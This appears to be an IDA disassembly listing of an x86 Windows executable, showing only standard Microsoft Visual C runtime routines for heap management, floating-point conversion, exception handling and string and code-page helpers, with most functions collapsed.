; [0000002C BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION operator new(uint). PRESS KEYPAD "+" TO EXPAND]
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION __cfltcvt_init. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov ecx, [esp+4]
mov eax, dword_444934
mov dword_444934, ecx
retn
; [0000001E BYTES: COLLAPSED FUNCTION __fpmath. PRESS KEYPAD "+" TO EXPAND]
; [00000075 BYTES: COLLAPSED FUNCTION __ftol2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
_fast_error_exit:
cmp dword_444944, 1
jnz short loc_401EFC
call __FF_MSGBANNER
loc_401EFC: ; CODE XREF: .text:00401EF5�j
push dword ptr [esp+4]
call __NMSG_WRITE
push 0FFh
call unknown_libname_1 ; Microsoft VisualC 2-8/net runtime
; ---------------------------------------------------------------------------
db 59h ; Y
db 59h ; Y
db 0C3h ; Ã
; ---------------------------------------------------------------------------
_check_managed_app:
push 0
call ds:GetModuleHandleA ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_401F40
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 4550h
jnz short loc_401F40
movzx eax, word ptr [ecx+18h]
cmp eax, 10Bh
jz short loc_401F56
cmp eax, 20Bh
jz short loc_401F43
loc_401F40: ; CODE XREF: .text:00401F1F�j
; .text:00401F2C�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_401F43: ; CODE XREF: .text:00401F3E�j
xor eax, eax
cmp dword ptr [ecx+84h], 0Eh
jbe short locret_401F67
cmp [ecx+0F8h], eax
jmp short loc_401F64
; ---------------------------------------------------------------------------
loc_401F56: ; CODE XREF: .text:00401F37�j
xor eax, eax
cmp dword ptr [ecx+74h], 0Eh
jbe short locret_401F67
cmp [ecx+0E8h], eax
loc_401F64: ; CODE XREF: .text:00401F54�j
setnz al
locret_401F67: ; CODE XREF: .text:00401F4C�j
; .text:00401F5C�j
retn
; [000001DC BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; [0000001A BYTES: COLLAPSED FUNCTION ___heap_select. PRESS KEYPAD "+" TO EXPAND]
; [00000051 BYTES: COLLAPSED FUNCTION __heap_init. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__heap_term:
cmp dword_444F14, 3
jnz short loc_402221
push ebx
xor ebx, ebx
cmp dword_444EF8, ebx
push ebp
mov ebp, ds:HeapFree
jle short loc_40220F
push esi
mov esi, lpMem
push edi
mov edi, ds:VirtualFree
add esi, 0Ch
loc_4021DB: ; CODE XREF: .text:0040220B�j
push 4000h
push 100000h
push dword ptr [esi]
call edi ; VirtualFree
push 8000h
push 0
push dword ptr [esi]
call edi ; VirtualFree
push dword ptr [esi+4]
push 0
push hHeap
call ebp ; HeapFree
add esi, 14h
inc ebx
cmp ebx, dword_444EF8
jl short loc_4021DB
pop edi
pop esi
loc_40220F: ; CODE XREF: .text:004021C8�j
push lpMem
push 0
push hHeap
call ebp ; HeapFree
pop ebp
pop ebx
loc_402221: ; CODE XREF: .text:004021B6�j
push hHeap
call ds:HeapDestroy ; HeapDestroy
retn
; ---------------------------------------------------------------------------
mov eax, hHeap
retn
; [00000015 BYTES: COLLAPSED FUNCTION __get_sbh_threshold. PRESS KEYPAD "+" TO EXPAND]
; [00000048 BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; [00000318 BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
; [000000B7 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
; [00000106 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
; [000002DF BYTES: COLLAPSED FUNCTION ___sbh_resize_block. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
___sbh_heapmin:
mov eax, dword_444EF4
test eax, eax
jz locret_402B40
mov ecx, dword_444F0C
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
push 8000h
push ecx
call ds:VirtualFree ; VirtualFree
mov ecx, dword_444F0C
mov eax, dword_444EF4
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_444EF4
mov eax, [eax+10h]
mov ecx, dword_444F0C
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_444EF4
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_444EF4
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_402AE7
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_444EF4
loc_402AE7: ; CODE XREF: .text:00402ADC�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_402B39
cmp dword_444EF8, 1
jle short loc_402B39
push dword ptr [eax+10h]
push 0
push hHeap
call ds:HeapFree
mov eax, dword_444EF8
mov edx, lpMem
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_444EF4
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call _memcpy_0
add esp, 0Ch
dec dword_444EF8
loc_402B39: ; CODE XREF: .text:00402AEB�j
; .text:00402AF4�j
and dword_444EF4, 0
locret_402B40: ; CODE XREF: .text:00402A77�j
retn
; [00000319 BYTES: COLLAPSED FUNCTION ___sbh_heap_check. PRESS KEYPAD "+" TO EXPAND]
; [0000005B BYTES: COLLAPSED FUNCTION __set_sbh_threshold. PRESS KEYPAD "+" TO EXPAND]
; [000002FC BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov ecx, [esp+4]
mov eax, dword_444948
mov dword_444948, ecx
retn
; ---------------------------------------------------------------------------
mov eax, dword_444948
retn
; [0000001B BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION __forcdecpt. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__cropzeros: ; DATA XREF: __cfltcvt_init+A�o
mov eax, [esp+4]
push ebx
mov bl, byte_40A1B4
jmp short loc_40324C
; ---------------------------------------------------------------------------
loc_403247: ; CODE XREF: .text:00403250�j
cmp cl, bl
jz short loc_403252
inc eax
loc_40324C: ; CODE XREF: .text:00403245�j
mov cl, [eax]
test cl, cl
jnz short loc_403247
loc_403252: ; CODE XREF: .text:00403249�j
mov cl, [eax]
inc eax
test cl, cl
jz short loc_403283
jmp short loc_403266
; ---------------------------------------------------------------------------
loc_40325B: ; CODE XREF: .text:0040326A�j
cmp cl, 65h
jz short loc_40326C
cmp cl, 45h
jz short loc_40326C
inc eax
loc_403266: ; CODE XREF: .text:00403259�j
mov cl, [eax]
test cl, cl
jnz short loc_40325B
loc_40326C: ; CODE XREF: .text:0040325E�j
; .text:00403263�j
mov edx, eax
loc_40326E: ; CODE XREF: .text:00403272�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_40326E
cmp [eax], bl
jnz short loc_403279
dec eax
loc_403279: ; CODE XREF: .text:00403276�j
; .text:00403281�j
mov cl, [edx]
inc eax
inc edx
test cl, cl
mov [eax], cl
jnz short loc_403279
loc_403283: ; CODE XREF: .text:00403257�j
pop ebx
retn
; ---------------------------------------------------------------------------
__positive: ; DATA XREF: __cfltcvt_init+28�o
mov eax, [esp+4]
fld qword ptr [eax]
fcomp ds:dbl_4082A8
fnstsw ax
test ah, 1
jnz short loc_40329C
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_40329C: ; CODE XREF: .text:00403296�j
xor eax, eax
retn
; [0000003E BYTES: COLLAPSED FUNCTION __fassign. PRESS KEYPAD "+" TO EXPAND]
; [0000001D BYTES: COLLAPSED FUNCTION __shift. PRESS KEYPAD "+" TO EXPAND]
; [000000F1 BYTES: COLLAPSED FUNCTION __cftoe. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__cftoe_g:
push dword ptr [esp+10h]
mov byte_444954, 1
push dword ptr [esp+10h]
push dword ptr [esp+10h]
push dword ptr [esp+10h]
call __cftoe
add esp, 10h
mov byte_444954, 0
retn
; [000000DD BYTES: COLLAPSED FUNCTION __cftof. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__cftof_g:
push dword ptr [esp+0Ch]
mov byte_444954, 1
push dword ptr [esp+0Ch]
push dword ptr [esp+0Ch]
call __cftof
add esp, 0Ch
mov byte_444954, 0
retn
; [000000AA BYTES: COLLAPSED FUNCTION __cftog. PRESS KEYPAD "+" TO EXPAND]
; [00000051 BYTES: COLLAPSED FUNCTION __cfltcvt. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION __setdefaultprecision. PRESS KEYPAD "+" TO EXPAND]
; [00000040 BYTES: COLLAPSED FUNCTION __ms_p5_test_fdiv. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION __ms_p5_mp_test_fdiv. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
align 4
__initterm:
push esi
mov esi, eax
jmp short loc_4036C8
; ---------------------------------------------------------------------------
loc_4036BD: ; CODE XREF: .text:004036CC�j
mov eax, [esi]
test eax, eax
jz short loc_4036C5
call eax
loc_4036C5: ; CODE XREF: .text:004036C1�j
add esi, 4
loc_4036C8: ; CODE XREF: .text:004036BB�j
cmp esi, [esp+8]
jb short loc_4036BD
pop esi
retn
; ---------------------------------------------------------------------------
__initterm_e:
push esi
mov esi, eax
xor eax, eax
jmp short loc_4036E6
; ---------------------------------------------------------------------------
loc_4036D7: ; CODE XREF: .text:004036EA�j
test eax, eax
jnz short loc_4036EC
mov ecx, [esi]
test ecx, ecx
jz short loc_4036E3
call ecx
loc_4036E3: ; CODE XREF: .text:004036DF�j
add esi, 4
loc_4036E6: ; CODE XREF: .text:004036D5�j
cmp esi, [esp+8]
jb short loc_4036D7
loc_4036EC: ; CODE XREF: .text:004036D9�j
pop esi
retn
; [0000006A BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
; [000000C1 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __cexit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __c_exit. PRESS KEYPAD "+" TO EXPAND]
; [00000177 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__GET_RTERRMSG:
mov ecx, [esp+4]
xor eax, eax
loc_4039D6: ; CODE XREF: .text:004039E3�j
cmp ecx, dword_40A088[eax*8]
jz short loc_4039E5
inc eax
cmp eax, 13h
jb short loc_4039D6
loc_4039E5: ; CODE XREF: .text:004039DD�j
shl eax, 3
cmp ecx, dword_40A088[eax]
jnz short loc_4039F7
mov eax, off_40A08C[eax]
retn
; ---------------------------------------------------------------------------
loc_4039F7: ; CODE XREF: .text:004039EE�j
xor eax, eax
retn
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
_xcptlookup:
mov ecx, dword_40A1A0
mov eax, offset dword_40A120
push esi
loc_403A3F: ; CODE XREF: .text:00403A52�j
cmp [eax], edx
jz short loc_403A54
lea esi, [ecx+ecx*2]
add eax, 0Ch
lea esi, ds:40A120h[esi*4]
cmp eax, esi
jb short loc_403A3F
loc_403A54: ; CODE XREF: .text:00403A41�j
lea ecx, [ecx+ecx*2]
lea ecx, ds:40A120h[ecx*4]
cmp eax, ecx
pop esi
jnb short loc_403A67
cmp [eax], edx
jz short locret_403A69
loc_403A67: ; CODE XREF: .text:00403A61�j
xor eax, eax
locret_403A69: ; CODE XREF: .text:00403A65�j
retn
; [00000171 BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
___CppXcptFilter:
mov eax, 0E06D7363h
cmp [esp+4], eax
jnz short loc_403BF3
push dword ptr [esp+8]
push eax
call __XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_403BF3: ; CODE XREF: .text:00403BE4�j
xor eax, eax
retn
; [0000005D BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
; [000000C7 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [0000016C BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [000000A2 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [00000122 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
; [000001AB BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__ioterm:
push esi
mov esi, offset dword_444DE0
loc_4041FB: ; CODE XREF: .text:00404214�j
mov eax, [esi]
test eax, eax
jz short loc_40420B
push eax
call _free
and dword ptr [esi], 0
pop ecx
loc_40420B: ; CODE XREF: .text:004041FF�j
add esi, 4
cmp esi, offset dword_444EE0
jl short loc_4041FB
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404218 proc near ; CODE XREF: start:loc_40205B�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_408720
call __SEH_prolog
mov [ebp+var_1C], offset dword_408F3C
loc_40422B: ; CODE XREF: sub_404218+3C�j
cmp [ebp+var_1C], offset dword_408F3C
jnb short loc_404256
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_40424C
call eax
jmp short loc_40424C
; ---------------------------------------------------------------------------
loc_404245: ; DATA XREF: .rdata:stru_408720�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_404249: ; DATA XREF: .rdata:stru_408720�o
mov esp, [ebp+ms_exc.old_esp]
loc_40424C: ; CODE XREF: sub_404218+27�j
; sub_404218+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_40422B
; ---------------------------------------------------------------------------
loc_404256: ; CODE XREF: sub_404218+1A�j
call __SEH_epilog
retn
sub_404218 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_40425C()
sub_40425C proc near ; DATA XREF: __cinit:loc_403729�o
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_408730
call __SEH_prolog
mov [ebp+var_1C], offset dword_408F44
loc_40426F: ; CODE XREF: sub_40425C+3C�j
cmp [ebp+var_1C], offset dword_408F44
jnb short loc_40429A
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_404290
call eax
jmp short loc_404290
; ---------------------------------------------------------------------------
loc_404289: ; DATA XREF: .rdata:stru_408730�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_40428D: ; DATA XREF: .rdata:stru_408730�o
mov esp, [ebp+ms_exc.old_esp]
loc_404290: ; CODE XREF: sub_40425C+27�j
; sub_40425C+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_40426F
; ---------------------------------------------------------------------------
loc_40429A: ; CODE XREF: sub_40425C+1A�j
call __SEH_epilog
retn
sub_40425C endp
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000E6 BYTES: COLLAPSED FUNCTION __except_handler3. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION _seh_longjmp_unwind(x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003D BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov eax, off_40A1C0
retn
; ---------------------------------------------------------------------------
mov eax, off_40A1BC
retn
; ---------------------------------------------------------------------------
__chvalidator:
mov eax, [esp+4]
mov ecx, off_40A1BC
movzx eax, word ptr [ecx+eax*2]
and eax, [esp+8]
retn
; [0000007E BYTES: COLLAPSED FUNCTION __isctype. PRESS KEYPAD "+" TO EXPAND]
; [00000008 BYTES: COLLAPSED FUNCTION __tolower. PRESS KEYPAD "+" TO EXPAND]
; [000000D5 BYTES: COLLAPSED FUNCTION _tolower. PRESS KEYPAD "+" TO EXPAND]
; [00000032 BYTES: COLLAPSED FUNCTION __ZeroTail. PRESS KEYPAD "+" TO EXPAND]
; [0000004D BYTES: COLLAPSED FUNCTION __IncMan. PRESS KEYPAD "+" TO EXPAND]
; [00000072 BYTES: COLLAPSED FUNCTION __RoundMan. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __CopyMan. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__FillZeroMan:
push edi
mov edi, [esp+8]
xor eax, eax
stosd
stosd
stosd
pop edi
retn
; [00000019 BYTES: COLLAPSED FUNCTION __IsZeroMan. PRESS KEYPAD "+" TO EXPAND]
; [0000007B BYTES: COLLAPSED FUNCTION __ShrMan. PRESS KEYPAD "+" TO EXPAND]
; [00000158 BYTES: COLLAPSED FUNCTION __ld12cvt. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_404BFB proc near ; CODE XREF: sub_404CA3+2B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_40A1C4
push [esp+4+arg_4]
push [esp+8+arg_0]
call __ld12cvt
add esp, 0Ch
retn
sub_404BFB endp
; =============== S U B R O U T I N E =======================================
sub_404C11 proc near ; CODE XREF: sub_404D1E+2B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_40A1DC
push [esp+4+arg_4]
push [esp+8+arg_0]
call __ld12cvt
add esp, 0Ch
retn
sub_404C11 endp
; [0000007C BYTES: COLLAPSED FUNCTION __ld12told. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404CA3 proc near ; CODE XREF: __fassign+12�p
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_40A200
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
call ___strgtold12
push [ebp+arg_0]
lea eax, [ebp+var_10]
push eax
call sub_404BFB
mov ecx, [ebp+var_4]
add esp, 24h
call sub_4055F5
leave
retn
sub_404CA3 endp
; [0000003E BYTES: COLLAPSED FUNCTION __atoldbl. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D1E proc near ; CODE XREF: __fassign+2D�p
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_40A200
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
call ___strgtold12
push [ebp+arg_0]
lea eax, [ebp+var_10]
push eax
call sub_404C11
mov ecx, [ebp+var_4]
add esp, 24h
call sub_4055F5
leave
retn
sub_404D1E endp
; ---------------------------------------------------------------------------
align 10h
; [0000008B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E8 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
; [00000077 BYTES: COLLAPSED FUNCTION __fptostr. PRESS KEYPAD "+" TO EXPAND]
; [000000BA BYTES: COLLAPSED FUNCTION ___dtold. PRESS KEYPAD "+" TO EXPAND]
; [00000074 BYTES: COLLAPSED FUNCTION __fltout. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000060 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION __fptrap. PRESS KEYPAD "+" TO EXPAND]
; [0000002A BYTES: COLLAPSED FUNCTION __fpreset. PRESS KEYPAD "+" TO EXPAND]
; [00000092 BYTES: COLLAPSED FUNCTION __abstract_cw. PRESS KEYPAD "+" TO EXPAND]
; [0000008E BYTES: COLLAPSED FUNCTION __hw_cw. PRESS KEYPAD "+" TO EXPAND]
; [00000039 BYTES: COLLAPSED FUNCTION __abstract_sw. PRESS KEYPAD "+" TO EXPAND]
; [00000010 BYTES: COLLAPSED FUNCTION __statusfp. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __clearfp. PRESS KEYPAD "+" TO EXPAND]
; [00000032 BYTES: COLLAPSED FUNCTION __control87. PRESS KEYPAD "+" TO EXPAND]
; [00000016 BYTES: COLLAPSED FUNCTION __controlfp. PRESS KEYPAD "+" TO EXPAND]
; [00000082 BYTES: COLLAPSED FUNCTION __onexit. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _atexit. PRESS KEYPAD "+" TO EXPAND]
; [00000028 BYTES: COLLAPSED FUNCTION ___onexitinit. PRESS KEYPAD "+" TO EXPAND]
; [000000F9 BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000124 BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [0000001D BYTES: COLLAPSED CHUNK OF FUNCTION sub_4055F5. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4055E1 proc near ; DATA XREF: .rdata:stru_408CB8�o
xor eax, eax
inc eax
retn
sub_4055E1 endp
; =============== S U B R O U T I N E =======================================
sub_4055E5 proc near ; DATA XREF: .rdata:stru_408CB8�o
mov esp, [ebp-18h]
sub_4055E5 endp ; sp-analysis failed
; [0000000C BYTES: COLLAPSED CHUNK OF FUNCTION sub_4055F5. PRESS KEYPAD "+" TO EXPAND]
db 0CCh
; [0000000E BYTES: COLLAPSED FUNCTION sub_4055F5. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _x_ismbbtype. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push 1
push 0
push dword ptr [esp+0Ch]
call _x_ismbbtype
add esp, 0Ch
retn
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbkprint. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbkpunct. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbalnum. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbalpha. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbgraph. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbprint. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbpunct. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbtrail. PRESS KEYPAD "+" TO EXPAND]
; [00000027 BYTES: COLLAPSED FUNCTION __ismbbkana. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
_getSystemCP:
and dword_444B04, 0
cmp eax, 0FFFFFFFEh
jnz short loc_40572F
mov dword_444B04, 1
jmp ds:GetOEMCP
; ---------------------------------------------------------------------------
loc_40572F: ; CODE XREF: .text:0040571D�j
cmp eax, 0FFFFFFFDh
jnz short loc_405744
mov dword_444B04, 1
jmp ds:GetACP
; ---------------------------------------------------------------------------
loc_405744: ; CODE XREF: .text:00405732�j
cmp eax, 0FFFFFFFCh
jnz short locret_405758
mov eax, dword_444B70
mov dword_444B04, 1
locret_405758: ; CODE XREF: .text:00405747�j
retn
; [0000002F BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
; [0000018C BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
; [000001E6 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [00000010 BYTES: COLLAPSED FUNCTION __getmbcp. PRESS KEYPAD "+" TO EXPAND]
; [0000001E BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__NLG_Notify1:
push ebx
push ecx
mov ebx, offset dword_40A300
jmp short loc_405C6C
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
; [00000229 BYTES: COLLAPSED FUNCTION __ValidateEH3RN. PRESS KEYPAD "+" TO EXPAND]
; [000001BA BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
_strncnt:
mov ecx, [esp+4]
test ecx, ecx
jz short loc_406070
loc_406065: ; CODE XREF: .text:0040606E�j
dec ecx
cmp byte ptr [eax], 0
jz short loc_406071
inc eax
test ecx, ecx
jnz short loc_406065
loc_406070: ; CODE XREF: .text:00406063�j
dec ecx
loc_406071: ; CODE XREF: .text:00406069�j
mov eax, [esp+4]
sub eax, ecx
dec eax
retn
; [000003BC BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
; [00000021 BYTES: COLLAPSED FUNCTION ___addl. PRESS KEYPAD "+" TO EXPAND]
; [0000005E BYTES: COLLAPSED FUNCTION ___add_12. PRESS KEYPAD "+" TO EXPAND]
; [0000002E BYTES: COLLAPSED FUNCTION ___shl_12. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION ___shr_12. PRESS KEYPAD "+" TO EXPAND]
; [000000DE BYTES: COLLAPSED FUNCTION ___mtold12. PRESS KEYPAD "+" TO EXPAND]
; [00000457 BYTES: COLLAPSED FUNCTION ___strgtold12. PRESS KEYPAD "+" TO EXPAND]
off_406A44 dd offset loc_406659 ; DATA XREF: ___strgtold12+65�r
dd offset loc_4066A9 ; jump table for switch statement
dd offset loc_4066F4
dd offset loc_40671E
dd offset loc_406777
dd offset loc_4067EC
dd offset loc_40681C
dd offset loc_406866
dd offset loc_406845
dd offset loc_4068C8
dd offset loc_4068BA
dd offset loc_406886
; [0000004C BYTES: COLLAPSED FUNCTION ___STRINGTOLD. PRESS KEYPAD "+" TO EXPAND]
; [0000028E BYTES: COLLAPSED FUNCTION _$I10_OUTPUT. PRESS KEYPAD "+" TO EXPAND]
; [00000162 BYTES: COLLAPSED FUNCTION _realloc. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION __msize. PRESS KEYPAD "+" TO EXPAND]
